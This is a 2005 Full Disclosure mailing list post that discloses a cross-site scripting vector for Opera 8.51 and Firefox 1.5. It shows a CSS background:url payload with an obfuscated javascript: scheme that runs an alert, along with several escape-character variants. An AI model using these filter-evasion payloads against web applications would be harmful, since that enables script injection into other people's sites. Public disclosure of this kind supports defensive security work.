Full Disclosure mailing list archives
Opera/8.51 Firefox/1.5 XSS attacking vector
From: hoshikuzu stardust <st4rdust () gmail com>
Date: Sat, 3 Dec 2005 01:15:31 +0900
Hello full-disclosure. Sample: <anytag style="background:url("javascri\Dpt:/*/**/(function a() {alert('JavaScript is executed.')})();");" /> Affected Web browsers are `Opera Version 8.51` and `Firefox/1.5`. ( Tested on Windows XP servicepack2. ) Variant: "\d" "\D" "\0d" "\00000d" "\d " "\00000d " "\a" "\9" e.t.c. (Maybe we must checkout \7 via IE on Mac (a.k.a. BELL on Mac. ), I do not have Mac. If your web application does not sanitize output it is very easy to inject malicious scripts. Is it well-known information ? ,sorry. BEST REGARDS. -- hoshikuzu | star_dust _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Opera/8.51 Firefox/1.5 XSS attacking vector hoshikuzu stardust (Dec 02)